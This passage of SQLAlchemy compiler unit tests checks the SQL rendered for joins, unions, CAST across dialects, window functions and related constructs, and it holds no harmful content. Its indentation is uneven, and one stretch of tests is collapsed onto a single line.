            group_by=[table2.c.othername],
            order_by=[table2.c.othername],
        ),
        "SELECT myothertable.othername, "
        "count(myothertable.otherid) AS count_1 "
        "FROM myothertable "
        "GROUP BY myothertable.othername ORDER BY myothertable.othername",
    )

def test_custom_order_by_clause(self):
    class CustomCompiler(PGCompiler):
        def order_by_clause(self, select, **kw):
            return (
                super(CustomCompiler, self).order_by_clause(select, **kw)
                + " CUSTOMIZED"
            )

    class CustomDialect(PGDialect):
        name = "custom"
        statement_compiler = CustomCompiler

    stmt = select([table1.c.myid]).order_by(table1.c.myid)
    self.assert_compile(
        stmt,
        "SELECT mytable.myid FROM mytable ORDER BY "
        "mytable.myid CUSTOMIZED",
        dialect=CustomDialect(),
    )

def test_custom_group_by_clause(self):
    class CustomCompiler(PGCompiler):
        def group_by_clause(self, select, **kw):
            return (
                super(CustomCompiler, self).group_by_clause(select, **kw)
                + " CUSTOMIZED"
            )

    class CustomDialect(PGDialect):
        name = "custom"
        statement_compiler = CustomCompiler

    stmt = select([table1.c.myid]).group_by(table1.c.myid)
    self.assert_compile(
        stmt,
        "SELECT mytable.myid FROM mytable GROUP BY "
        "mytable.myid CUSTOMIZED",
        dialect=CustomDialect(),
    )

def test_for_update(self):
    self.assert_compile(
        table1.select(table1.c.myid == 7).with_for_update(),
        "SELECT mytable.myid, mytable.name, mytable.description "
        "FROM mytable WHERE mytable.myid = :myid_1 FOR UPDATE",
    )

    # not supported by dialect, should just use update
    self.assert_compile(
        table1.select(table1.c.myid == 7).with_for_update(nowait=True),
        "SELECT mytable.myid, mytable.name, mytable.description "
        "FROM mytable WHERE mytable.myid = :myid_1 FOR UPDATE",
    )

def test_alias(self):
    # test the alias for a table1.  column names stay the same,
    # table name "changes" to "foo".
    self.assert_compile(
        select([table1.alias("foo")]),
        "SELECT foo.myid, foo.name, foo.description FROM mytable AS foo",
    )

    for dialect in (oracle.dialect(),):
        self.assert_compile(
            select([table1.alias("foo")]),
            "SELECT foo.myid, foo.name, foo.description FROM mytable foo",
            dialect=dialect,
        )

    self.assert_compile(
        select([table1.alias()]),
        "SELECT mytable_1.myid, mytable_1.name, mytable_1.description "
        "FROM mytable AS mytable_1",
    )

    # create a select for a join of two tables. use_labels
    # means the column names will have labels tablename_columnname,
    # which become the column keys accessible off the Selectable object.
    # also, only use one column from the second table and all columns
    # from the first table1.
    q = select(
        [table1, table2.c.otherid],
        table1.c.myid == table2.c.otherid,
        use_labels=True,
    )

    # make an alias of the "selectable".  column names
    # stay the same (i.e. the labels), table name "changes" to "t2view".
    a = alias(q, "t2view")

    # select from that alias, also using labels.  two levels of labels
    # should produce two underscores.
    # also, reference the column "mytable_myid" off of the t2view alias.
    self.assert_compile(
        a.select(a.c.mytable_myid == 9, use_labels=True),
        "SELECT t2view.mytable_myid AS t2view_mytable_myid, "
        "t2view.mytable_name "
        "AS t2view_mytable_name, "
        "t2view.mytable_description AS t2view_mytable_description, "
        "t2view.myothertable_otherid AS t2view_myothertable_otherid FROM "
        "(SELECT mytable.myid AS mytable_myid, "
        "mytable.name AS mytable_name, "
        "mytable.description AS mytable_description, "
        "myothertable.otherid AS "
        "myothertable_otherid FROM mytable, myothertable "
        "WHERE mytable.myid = "
        "myothertable.otherid) AS t2view "
        "WHERE t2view.mytable_myid = :mytable_myid_1",
    )

def test_prefix(self):
    self.assert_compile(
        table1.select()
        .prefix_with("SQL_CALC_FOUND_ROWS")
        .prefix_with("SQL_SOME_WEIRD_MYSQL_THING"),
        "SELECT SQL_CALC_FOUND_ROWS SQL_SOME_WEIRD_MYSQL_THING "
        "mytable.myid, mytable.name, mytable.description FROM mytable",
    )

def test_prefix_dialect_specific(self):
    # only the prefix registered for the active dialect renders.
    self.assert_compile(
        table1.select()
        .prefix_with("SQL_CALC_FOUND_ROWS", dialect="sqlite")
        .prefix_with("SQL_SOME_WEIRD_MYSQL_THING", dialect="mysql"),
        "SELECT SQL_SOME_WEIRD_MYSQL_THING "
        "mytable.myid, mytable.name, mytable.description FROM mytable",
        dialect=mysql.dialect(),
    )

def test_collate(self):
    # columns clause
    self.assert_compile(
        select([column("x").collate("bar")]),
        "SELECT x COLLATE bar AS anon_1",
    )

    # WHERE clause
    self.assert_compile(
        select([column("x")]).where(column("x").collate("bar") == "foo"),
        "SELECT x WHERE (x COLLATE bar) = :param_1",
    )

    # ORDER BY clause
    self.assert_compile(
        select([column("x")]).order_by(column("x").collate("bar")),
        "SELECT x ORDER BY x COLLATE bar",
    )

def test_literal(self):
    self.assert_compile(
        select([literal("foo")]), "SELECT :param_1 AS anon_1"
    )

    self.assert_compile(
        select([literal("foo") + literal("bar")], from_obj=[table1]),
        "SELECT :param_1 || :param_2 AS anon_1 FROM mytable",
    )

def test_calculated_columns(self):
    value_tbl = table(
        "values",
        column("id", Integer),
        column("val1", Float),
        column("val2", Float),
    )

    self.assert_compile(
        select(
            [
                value_tbl.c.id,
                (value_tbl.c.val2 - value_tbl.c.val1) / value_tbl.c.val1,
            ]
        ),
        "SELECT values.id, (values.val2 - values.val1) "
        "/ values.val1 AS anon_1 FROM values",
    )

    self.assert_compile(
        select(
            [value_tbl.c.id],
            (value_tbl.c.val2 - value_tbl.c.val1) / value_tbl.c.val1 > 2.0,
        ),
        "SELECT values.id FROM values WHERE "
        "(values.val2 - values.val1) / values.val1 > :param_1",
    )

    self.assert_compile(
        select(
            [value_tbl.c.id],
            value_tbl.c.val1
            / (value_tbl.c.val2 - value_tbl.c.val1)
            / value_tbl.c.val1
            > 2.0,
        ),
        "SELECT values.id FROM values WHERE "
        "(values.val1 / (values.val2 - values.val1)) "
        "/ values.val1 > :param_1",
    )

def test_percent_chars(self):
    t = table(
        "table%name",
        column("percent%"),
        column("%(oneofthese)s"),
        column("spaces % more spaces"),
    )
    self.assert_compile(
        t.select(use_labels=True),
        """SELECT "table%name"."percent%" AS "table%name_percent%", """
        """"table%name"."%(oneofthese)s" AS """
        """"table%name_%(oneofthese)s", """
        """"table%name"."spaces % more spaces" AS """
        """"table%name_spaces % """
        '''more spaces" FROM "table%name"''',
    )

def test_joins(self):
    self.assert_compile(
        join(table2, table1, table1.c.myid == table2.c.otherid).select(),
        "SELECT myothertable.otherid, myothertable.othername, "
        "mytable.myid, mytable.name, mytable.description FROM "
        "myothertable JOIN mytable ON mytable.myid = myothertable.otherid",
    )

    self.assert_compile(
        select(
            [table1],
            from_obj=[
                join(table1, table2, table1.c.myid == table2.c.otherid)
            ],
        ),
        "SELECT mytable.myid, mytable.name, mytable.description FROM "
        "mytable JOIN myothertable ON mytable.myid = myothertable.otherid",
    )

    self.assert_compile(
        select(
            [
                join(
                    join(
                        table1, table2, table1.c.myid == table2.c.otherid
                    ),
                    table3,
                    table1.c.myid == table3.c.userid,
                )
            ]
        ),
        "SELECT mytable.myid, mytable.name, mytable.description, "
        "myothertable.otherid, myothertable.othername, "
        "thirdtable.userid, "
        "thirdtable.otherstuff FROM mytable JOIN myothertable "
        "ON mytable.myid ="
        " myothertable.otherid JOIN thirdtable ON "
        "mytable.myid = thirdtable.userid",
    )

    self.assert_compile(
        join(
            users, addresses, users.c.user_id == addresses.c.user_id
        ).select(),
        "SELECT users.user_id, users.user_name, users.password, "
        "addresses.address_id, addresses.user_id, addresses.street, "
        "addresses.city, addresses.state, addresses.zip "
        "FROM users JOIN addresses "
        "ON users.user_id = addresses.user_id",
    )

    self.assert_compile(
        select(
            [table1, table2, table3],
            from_obj=[
                join(
                    table1, table2, table1.c.myid == table2.c.otherid
                ).outerjoin(table3, table1.c.myid == table3.c.userid)
            ],
        ),
        "SELECT mytable.myid, mytable.name, mytable.description, "
        "myothertable.otherid, myothertable.othername, "
        "thirdtable.userid,"
        " thirdtable.otherstuff FROM mytable "
        "JOIN myothertable ON mytable.myid "
        "= myothertable.otherid LEFT OUTER JOIN thirdtable "
        "ON mytable.myid ="
        " thirdtable.userid",
    )
    self.assert_compile(
        select(
            [table1, table2, table3],
            from_obj=[
                outerjoin(
                    table1,
                    join(
                        table2, table3, table2.c.otherid == table3.c.userid
                    ),
                    table1.c.myid == table2.c.otherid,
                )
            ],
        ),
        "SELECT mytable.myid, mytable.name, mytable.description, "
        "myothertable.otherid, myothertable.othername, "
        "thirdtable.userid,"
        " thirdtable.otherstuff FROM mytable LEFT OUTER JOIN "
        "(myothertable "
        "JOIN thirdtable ON myothertable.otherid = "
        "thirdtable.userid) ON "
        "mytable.myid = myothertable.otherid",
    )

    query = select(
        [table1, table2],
        or_(
            table1.c.name == "fred",
            table1.c.myid == 10,
            table2.c.othername != "jack",
            text("EXISTS (select yay from foo where boo = lar)"),
        ),
        from_obj=[
            outerjoin(table1, table2, table1.c.myid == table2.c.otherid)
        ],
    )
    self.assert_compile(
        query,
        "SELECT mytable.myid, mytable.name, mytable.description, "
        "myothertable.otherid, myothertable.othername "
        "FROM mytable LEFT OUTER JOIN myothertable ON mytable.myid = "
        "myothertable.otherid WHERE mytable.name = :name_1 OR "
        "mytable.myid = :myid_1 OR myothertable.othername != :othername_1 "
        "OR EXISTS (select yay from foo where boo = lar)",
    )

def test_full_outer_join(self):
    # all four spellings of full=True produce the same FULL OUTER JOIN.
    for spec in [
        join(table1, table2, table1.c.myid == table2.c.otherid, full=True),
        outerjoin(
            table1, table2, table1.c.myid == table2.c.otherid, full=True
        ),
        table1.join(table2, table1.c.myid == table2.c.otherid, full=True),
        table1.outerjoin(
            table2, table1.c.myid == table2.c.otherid, full=True
        ),
    ]:
        stmt = select([table1]).select_from(spec)
        self.assert_compile(
            stmt,
            "SELECT mytable.myid, mytable.name, mytable.description FROM "
            "mytable FULL OUTER JOIN myothertable "
            "ON mytable.myid = myothertable.otherid",
        )

def test_compound_selects(self):
    assert_raises_message(
        exc.ArgumentError,
        "All selectables passed to CompoundSelect "
        "must have identical numbers of columns; "
        "select #1 has 2 columns, select #2 has 3",
        union,
        table3.select(),
        table1.select(),
    )

    x = union(
        select([table1], table1.c.myid == 5),
        select([table1], table1.c.myid == 12),
        order_by=[table1.c.myid],
    )

    self.assert_compile(
        x,
        "SELECT mytable.myid, mytable.name, "
        "mytable.description "
        "FROM mytable WHERE "
        "mytable.myid = :myid_1 UNION "
        "SELECT mytable.myid, mytable.name, mytable.description "
        "FROM mytable WHERE mytable.myid = :myid_2 "
        "ORDER BY mytable.myid",
    )

    x = union(select([table1]), select([table1]))
    x = union(x, select([table1]))
    self.assert_compile(
        x,
        "(SELECT mytable.myid, mytable.name, mytable.description "
        "FROM mytable UNION SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable) UNION SELECT mytable.myid,"
        " mytable.name, mytable.description FROM mytable",
    )

    u1 = union(
        select([table1.c.myid, table1.c.name]),
        select([table2]),
        select([table3]),
    )
    self.assert_compile(
        u1,
        "SELECT mytable.myid, mytable.name "
        "FROM mytable UNION SELECT myothertable.otherid, "
        "myothertable.othername FROM myothertable "
        "UNION SELECT thirdtable.userid, thirdtable.otherstuff "
        "FROM thirdtable",
    )

    assert u1.corresponding_column(table2.c.otherid) is u1.c.myid

    self.assert_compile(
        union(
            select([table1.c.myid, table1.c.name]),
            select([table2]),
            order_by=["myid"],
            offset=10,
            limit=5,
        ),
        "SELECT mytable.myid, mytable.name "
        "FROM mytable UNION SELECT myothertable.otherid, "
        "myothertable.othername "
        "FROM myothertable ORDER BY myid "  # note table name is omitted
        "LIMIT :param_1 OFFSET :param_2",
        {"param_1": 5, "param_2": 10},
    )

    self.assert_compile(
        union(
            select(
                [
                    table1.c.myid,
                    table1.c.name,
                    func.max(table1.c.description),
                ],
                table1.c.name == "name2",
                group_by=[table1.c.myid, table1.c.name],
            ),
            table1.select(table1.c.name == "name1"),
        ),
        "SELECT mytable.myid, mytable.name, "
        "max(mytable.description) AS max_1 "
        "FROM mytable WHERE mytable.name = :name_1 "
        "GROUP BY mytable.myid, "
        "mytable.name UNION SELECT mytable.myid, mytable.name, "
        "mytable.description "
        "FROM mytable WHERE mytable.name = :name_2",
    )

    self.assert_compile(
        union(
            select([literal(100).label("value")]),
            select([literal(200).label("value")]),
        ),
        "SELECT :param_1 AS value UNION SELECT :param_2 AS value",
    )

    self.assert_compile(
        union_all(
            select([table1.c.myid]),
            union(select([table2.c.otherid]), select([table3.c.userid])),
        ),
        "SELECT mytable.myid FROM mytable UNION ALL "
        "(SELECT myothertable.otherid FROM myothertable UNION "
        "SELECT thirdtable.userid FROM thirdtable)",
    )

    s = select([column("foo"), column("bar")])

    self.assert_compile(
        union(s.order_by("foo"), s.order_by("bar")),
        "(SELECT foo, bar ORDER BY foo) UNION "
        "(SELECT foo, bar ORDER BY bar)",
    )
    self.assert_compile(
        union(
            s.order_by("foo").self_group(),
            s.order_by("bar").limit(10).self_group(),
        ),
        "(SELECT foo, bar ORDER BY foo) UNION (SELECT foo, "
        "bar ORDER BY bar LIMIT :param_1)",
        {"param_1": 10},
    )

def test_compound_grouping(self):
    # NOTE(review): fragment — this method continues past the end of
    # this chunk; the final string literal is cut mid-token.
    s = select([column("foo"), column("bar")]).select_from(text("bat"))

    self.assert_compile(
        union(union(union(s, s), s), s),
        "((SELECT foo, bar FROM bat UNION SELECT foo, bar FROM bat) "
        "UNION SELECT foo, bar FROM bat) UNION SELECT foo, bar FROM bat",
    )

    self.assert_compile(
        union(s, s, s, s),
        "SELECT foo, bar FROM 
bat UNION SELECT foo, bar " "FROM bat UNION SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat", ) self.assert_compile( union(s, union(s, union(s, s))), "SELECT foo, bar FROM bat UNION (SELECT foo, bar FROM bat " "UNION (SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat))", ) self.assert_compile( select([s.alias()]), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat) AS anon_1", ) self.assert_compile( select([union(s, s).alias()]), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat UNION " "SELECT foo, bar FROM bat) AS anon_1", ) self.assert_compile( select([except_(s, s).alias()]), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat EXCEPT " "SELECT foo, bar FROM bat) AS anon_1", ) # this query sqlite specifically chokes on self.assert_compile( union(except_(s, s), s), "(SELECT foo, bar FROM bat EXCEPT SELECT foo, bar FROM bat) " "UNION SELECT foo, bar FROM bat", ) self.assert_compile( union(s, except_(s, s)), "SELECT foo, bar FROM bat " "UNION (SELECT foo, bar FROM bat EXCEPT SELECT foo, bar FROM bat)", ) # this solves it self.assert_compile( union(except_(s, s).alias().select(), s), "SELECT anon_1.foo, anon_1.bar FROM " "(SELECT foo, bar FROM bat EXCEPT " "SELECT foo, bar FROM bat) AS anon_1 " "UNION SELECT foo, bar FROM bat", ) self.assert_compile( except_(union(s, s), union(s, s)), "(SELECT foo, bar FROM bat UNION SELECT foo, bar FROM bat) " "EXCEPT (SELECT foo, bar FROM bat UNION SELECT foo, bar FROM bat)", ) s2 = union(s, s) s3 = union(s2, s2) self.assert_compile( s3, "(SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat) " "UNION (SELECT foo, bar FROM bat " "UNION SELECT foo, bar FROM bat)", ) self.assert_compile( union(intersect(s, s), intersect(s, s)), "(SELECT foo, bar FROM bat INTERSECT SELECT foo, bar FROM bat) " "UNION (SELECT foo, bar FROM bat INTERSECT " "SELECT foo, bar FROM bat)", ) # tests for [ticket:2528] # sqlite hates all of these. 
        # UNION arms that carry their own LIMIT/OFFSET are individually
        # parenthesized so the modifiers bind to the arm, not the compound.
        self.assert_compile(
            union(s.limit(1), s.offset(2)),
            "(SELECT foo, bar FROM bat LIMIT :param_1) "
            "UNION (SELECT foo, bar FROM bat LIMIT -1 OFFSET :param_2)",
        )

        self.assert_compile(
            union(s.order_by(column("bar")), s.offset(2)),
            "(SELECT foo, bar FROM bat ORDER BY bar) "
            "UNION (SELECT foo, bar FROM bat LIMIT -1 OFFSET :param_1)",
        )

        self.assert_compile(
            union(s.limit(1).alias("a"), s.limit(2).alias("b")),
            "(SELECT foo, bar FROM bat LIMIT :param_1) "
            "UNION (SELECT foo, bar FROM bat LIMIT :param_2)",
        )

        self.assert_compile(
            union(s.limit(1).self_group(), s.limit(2).self_group()),
            "(SELECT foo, bar FROM bat LIMIT :param_1) "
            "UNION (SELECT foo, bar FROM bat LIMIT :param_2)",
        )

        self.assert_compile(
            union(s.limit(1), s.limit(2).offset(3)).alias().select(),
            "SELECT anon_1.foo, anon_1.bar FROM "
            "((SELECT foo, bar FROM bat LIMIT :param_1) "
            "UNION (SELECT foo, bar FROM bat LIMIT :param_2 OFFSET :param_3)) "
            "AS anon_1",
        )

        # this version works for SQLite
        self.assert_compile(
            union(s.limit(1).alias().select(), s.offset(2).alias().select()),
            "SELECT anon_1.foo, anon_1.bar "
            "FROM (SELECT foo, bar FROM bat"
            " LIMIT :param_1) AS anon_1 "
            "UNION SELECT anon_2.foo, anon_2.bar "
            "FROM (SELECT foo, bar "
            "FROM bat"
            " LIMIT -1 OFFSET :param_2) AS anon_2",
        )

    def test_cast(self):
        """Test rendering of CAST(expr AS type) across several dialects.

        ``check_results`` compiles the same set of CAST expressions against a
        given dialect and compares the rendered type names and bind-parameter
        placeholder style (``literal``) against ``expected_results``.
        """
        tbl = table(
            "casttest",
            column("id", Integer),
            column("v1", Float),
            column("v2", Float),
            column("ts", TIMESTAMP),
        )

        def check_results(dialect, expected_results, literal):
            # one expected type name per CAST variant exercised below
            eq_(
                len(expected_results),
                5,
                "Incorrect number of expected results",
            )
            eq_(
                str(cast(tbl.c.v1, Numeric).compile(dialect=dialect)),
                "CAST(casttest.v1 AS %s)" % expected_results[0],
            )
            # column.cast() method form renders identically to cast()
            eq_(
                str(tbl.c.v1.cast(Numeric).compile(dialect=dialect)),
                "CAST(casttest.v1 AS %s)" % expected_results[0],
            )
            eq_(
                str(cast(tbl.c.v1, Numeric(12, 9)).compile(dialect=dialect)),
                "CAST(casttest.v1 AS %s)" % expected_results[1],
            )
            eq_(
                str(cast(tbl.c.ts, Date).compile(dialect=dialect)),
                "CAST(casttest.ts AS %s)" % expected_results[2],
            )
            # casting plain Python values produces a bind parameter whose
            # placeholder syntax is dialect-specific (``literal``)
            eq_(
                str(cast(1234, Text).compile(dialect=dialect)),
                "CAST(%s AS %s)" % (literal, expected_results[3]),
            )
            eq_(
                str(cast("test", String(20)).compile(dialect=dialect)),
                "CAST(%s AS %s)" % (literal, expected_results[4]),
            )

            # fixme: shoving all of this dialect-specific stuff in one test
            # is now officially completely ridiculous AND non-obviously omits
            # coverage on other dialects.
            sel = select([tbl, cast(tbl.c.v1, Numeric)]).compile(
                dialect=dialect
            )
            if isinstance(dialect, type(mysql.dialect())):
                eq_(
                    str(sel),
                    "SELECT casttest.id, casttest.v1, casttest.v2, "
                    "casttest.ts, "
                    "CAST(casttest.v1 AS DECIMAL) AS anon_1 \nFROM casttest",
                )
            else:
                eq_(
                    str(sel),
                    "SELECT casttest.id, casttest.v1, casttest.v2, "
                    "casttest.ts, CAST(casttest.v1 AS NUMERIC) AS "
                    "anon_1 \nFROM casttest",
                )

        # first test with PostgreSQL engine
        check_results(
            postgresql.dialect(),
            ["NUMERIC", "NUMERIC(12, 9)", "DATE", "TEXT", "VARCHAR(20)"],
            "%(param_1)s",
        )

        # then the Oracle engine
        check_results(
            oracle.dialect(),
            ["NUMERIC", "NUMERIC(12, 9)", "DATE", "CLOB", "VARCHAR2(20 CHAR)"],
            ":param_1",
        )

        # then the sqlite engine
        check_results(
            sqlite.dialect(),
            ["NUMERIC", "NUMERIC(12, 9)", "DATE", "TEXT", "VARCHAR(20)"],
            "?",
        )

        # then the MySQL engine
        check_results(
            mysql.dialect(),
            ["DECIMAL", "DECIMAL(12, 9)", "DATE", "CHAR", "CHAR(20)"],
            "%s",
        )

        # NULL in its several spellings (text, null(), literal_column) all
        # render as an unparameterized CAST(NULL AS INTEGER)
        self.assert_compile(
            cast(text("NULL"), Integer),
            "CAST(NULL AS INTEGER)",
            dialect=sqlite.dialect(),
        )

        self.assert_compile(
            cast(null(), Integer),
            "CAST(NULL AS INTEGER)",
            dialect=sqlite.dialect(),
        )

        self.assert_compile(
            cast(literal_column("NULL"), Integer),
            "CAST(NULL AS INTEGER)",
            dialect=sqlite.dialect(),
        )

    def test_over(self):
        """Test OVER () window clause rendering: empty spec, ORDER BY,
        PARTITION BY, and combinations; empty lists are treated the same
        as omitting the corresponding sub-clause."""
        self.assert_compile(func.row_number().over(), "row_number() OVER ()")
        self.assert_compile(
            func.row_number().over(
                order_by=[table1.c.name, table1.c.description]
            ),
            "row_number() OVER (ORDER BY mytable.name, mytable.description)",
        )
        self.assert_compile(
            func.row_number().over(
                partition_by=[table1.c.name, table1.c.description]
            ),
            "row_number() OVER (PARTITION BY mytable.name, "
            "mytable.description)",
        )
        self.assert_compile(
            func.row_number().over(
                partition_by=[table1.c.name], order_by=[table1.c.description]
            ),
            "row_number() OVER (PARTITION BY mytable.name "
            "ORDER BY mytable.description)",
        )
        # scalar (non-list) arguments are accepted as well
        self.assert_compile(
            func.row_number().over(
                partition_by=table1.c.name, order_by=table1.c.description
            ),
            "row_number() OVER (PARTITION BY mytable.name "
            "ORDER BY mytable.description)",
        )
        self.assert_compile(
            func.row_number().over(
                partition_by=table1.c.name,
                order_by=[table1.c.name, table1.c.description],
            ),
            "row_number() OVER (PARTITION BY mytable.name "
            "ORDER BY mytable.name, mytable.description)",
        )
        # empty partition_by / order_by lists drop that sub-clause entirely
        self.assert_compile(
            func.row_number().over(
                partition_by=[], order_by=[table1.c.name, table1.c.description]
            ),
            "row_number() OVER (ORDER BY mytable.name, mytable.description)",
        )
        self.assert_compile(
            func.row_number().over(
                partition_by=[table1.c.name, table1.c.description], order_by=[]
            ),
            "row_number() OVER (PARTITION BY mytable.name, "
            "mytable.description)",
        )
        self.assert_compile(
            func.row_number().over(partition_by=[], order_by=[]),
            "row_number() OVER ()",
        )
        self.assert_compile(
            select(
                [
                    func.row_number()
                    .over(order_by=table1.c.description)
                    .label("foo")
                ]
            ),
            "SELECT row_number() OVER (ORDER BY mytable.description) "
            "AS foo FROM mytable",
        )

        # test from_obj generation.
        # from func:
        self.assert_compile(
            select(
                [func.max(table1.c.name).over(partition_by=["description"])]
            ),
            "SELECT max(mytable.name) OVER (PARTITION BY mytable.description) "
            "AS anon_1 FROM mytable",
        )

        # from partition_by
        self.assert_compile(
            select([func.row_number().over(partition_by=[table1.c.name])]),
            "SELECT row_number() OVER (PARTITION BY mytable.name) "
            "AS anon_1 FROM mytable",
        )

        # from order_by
        self.assert_compile(
            select([func.row_number().over(order_by=table1.c.name)]),
            "SELECT row_number() OVER (ORDER BY mytable.name) "
            "AS anon_1 FROM mytable",
        )

        # this tests that _from_objects
        # concatenates OK
        self.assert_compile(
            select([column("x") + over(func.foo())]),
            "SELECT x + foo() OVER () AS anon_1",
        )

        # test a reference to a label that in the referenced selectable;
        # this resolves
        expr = (table1.c.myid + 5).label("sum")
        stmt = select([expr]).alias()
        self.assert_compile(
            select([stmt.c.sum, func.row_number().over(order_by=stmt.c.sum)]),
            "SELECT anon_1.sum, row_number() OVER (ORDER BY anon_1.sum) "
            "AS anon_2 FROM (SELECT mytable.myid + :myid_1 AS sum "
            "FROM mytable) AS anon_1",
        )

        # test a reference to a label that's at the same level as the OVER
        # in the columns clause; doesn't resolve
        expr = (table1.c.myid + 5).label("sum")
        self.assert_compile(
            select([expr, func.row_number().over(order_by=expr)]),
            "SELECT mytable.myid + :myid_1 AS sum, "
            "row_number() OVER "
            "(ORDER BY mytable.myid + :myid_1) AS anon_1 FROM mytable",
        )

    def test_over_framespec(self):
        """Test ROWS / RANGE frame specifications on OVER.

        ``rows``/``range_`` are (start, end) tuples: 0 renders CURRENT ROW,
        None renders UNBOUNDED, negative integers render as PRECEDING binds
        (with the absolute value as the parameter) and positive integers as
        FOLLOWING binds.
        """
        expr = table1.c.myid
        self.assert_compile(
            select([func.row_number().over(order_by=expr, rows=(0, None))]),
            "SELECT row_number() OVER "
            "(ORDER BY mytable.myid ROWS BETWEEN CURRENT "
            "ROW AND UNBOUNDED FOLLOWING)"
            " AS anon_1 FROM mytable",
        )
        self.assert_compile(
            select([func.row_number().over(order_by=expr, rows=(None, None))]),
            "SELECT row_number() OVER "
            "(ORDER BY mytable.myid ROWS BETWEEN UNBOUNDED "
            "PRECEDING AND UNBOUNDED FOLLOWING)"
            " AS anon_1 FROM mytable",
        )
        self.assert_compile(
            select([func.row_number().over(order_by=expr, range_=(None, 0))]),
            "SELECT row_number() OVER "
            "(ORDER BY mytable.myid RANGE BETWEEN "
            "UNBOUNDED PRECEDING AND CURRENT ROW)"
            " AS anon_1 FROM mytable",
        )
        # note -5 renders as bind param 5 with PRECEDING
        self.assert_compile(
            select([func.row_number().over(order_by=expr, range_=(-5, 10))]),
            "SELECT row_number() OVER "
            "(ORDER BY mytable.myid RANGE BETWEEN "
            ":param_1 PRECEDING AND :param_2 FOLLOWING)"
            " AS anon_1 FROM mytable",
            checkparams={"param_1": 5, "param_2": 10},
        )
        self.assert_compile(
            select([func.row_number().over(order_by=expr, range_=(1, 10))]),
            "SELECT row_number() OVER "
            "(ORDER BY mytable.myid RANGE BETWEEN "
            ":param_1 FOLLOWING AND :param_2 FOLLOWING)"
            " AS anon_1 FROM mytable",
            checkparams={"param_1": 1, "param_2": 10},
        )
        self.assert_compile(
            select([func.row_number().over(order_by=expr, range_=(-10, -1))]),
            "SELECT row_number() OVER "
            "(ORDER BY mytable.myid RANGE BETWEEN "
            ":param_1 PRECEDING AND :param_2 PRECEDING)"
            " AS anon_1 FROM mytable",
            checkparams={"param_1": 10, "param_2": 1},
        )

    def test_over_invalid_framespecs(self):
        """Non-integer frame bounds and combined range_/rows both raise
        ArgumentError at construction time."""
        assert_raises_message(
            exc.ArgumentError,
            "Integer or None expected for range value",
            func.row_number().over,
            range_=("foo", 8),
        )

        assert_raises_message(
            exc.ArgumentError,
            "Integer or None expected for range value",
            func.row_number().over,
            range_=(-5, "foo"),
        )

        assert_raises_message(
            exc.ArgumentError,
            "'range_' and 'rows' are mutually exclusive",
            func.row_number().over,
            range_=(-5, 8),
            rows=(-2, 5),
        )

    def test_over_within_group(self):
        """WITHIN GROUP (ORDER BY ...) composes with an OVER clause,
        rendering the WITHIN GROUP portion before OVER."""
        from sqlalchemy import within_group

        stmt = select(
            [
                table1.c.myid,
                within_group(
                    func.percentile_cont(0.5), table1.c.name.desc()
                ).over(
                    range_=(1, 2),
                    partition_by=table1.c.name,
                    order_by=table1.c.myid,
                ),
            ]
        )
        eq_ignore_whitespace(
            str(stmt),
            "SELECT mytable.myid, percentile_cont(:percentile_cont_1) "
            "WITHIN GROUP (ORDER BY mytable.name DESC) "
            "OVER (PARTITION BY mytable.name ORDER BY mytable.myid "
            "RANGE BETWEEN :param_1 FOLLOWING AND :param_2 FOLLOWING) "
            "AS anon_1 FROM mytable",
        )

        # same construct with a ROWS frame instead of RANGE
        stmt = select(
            [
                table1.c.myid,
                within_group(
                    func.percentile_cont(0.5), table1.c.name.desc()
                ).over(
                    rows=(1, 2),
                    partition_by=table1.c.name,
                    order_by=table1.c.myid,
                ),
            ]
        )
        eq_ignore_whitespace(
            str(stmt),
            "SELECT mytable.myid, percentile_cont(:percentile_cont_1) "
            "WITHIN GROUP (ORDER BY mytable.name DESC) "
            "OVER (PARTITION BY mytable.name ORDER BY mytable.myid "
            "ROWS BETWEEN :param_1 FOLLOWING AND :param_2 FOLLOWING) "
            "AS anon_1 FROM mytable",
        )

    def test_date_between(self):
        """BETWEEN with date values binds both endpoints; both the column
        method form and the standalone sql.between() form render the same."""
        import datetime

        table = Table("dt", metadata, Column("date", Date))
        self.assert_compile(
            table.select(
                table.c.date.between(
                    datetime.date(2006, 6, 1), datetime.date(2006, 6, 5)
                )
            ),
            "SELECT dt.date FROM dt WHERE dt.date BETWEEN :date_1 AND :date_2",
            checkparams={
                "date_1": datetime.date(2006, 6, 1),
                "date_2": datetime.date(2006, 6, 5),
            },
        )

        self.assert_compile(
            table.select(
                sql.between(
                    table.c.date,
                    datetime.date(2006, 6, 1),
                    datetime.date(2006, 6, 5),
                )
            ),
            "SELECT dt.date FROM dt WHERE dt.date BETWEEN :date_1 AND :date_2",
            checkparams={
                "date_1": datetime.date(2006, 6, 1),
                "date_2": datetime.date(2006, 6, 5),
            },
        )

    def test_delayed_col_naming(self):
        """A Column with no name yet cannot be used as a selectable's
        column collection; see the remainder of this test below."""
        my_str = Column(String)

        sel1 = select([my_str])
        assert_raises_message(
            exc.InvalidRequestError,
            "Cannot initialize a sub-selectable with this Column",
            lambda: sel1.c,
        )

        # calling label or as_scalar doesn't compile
        # anything.
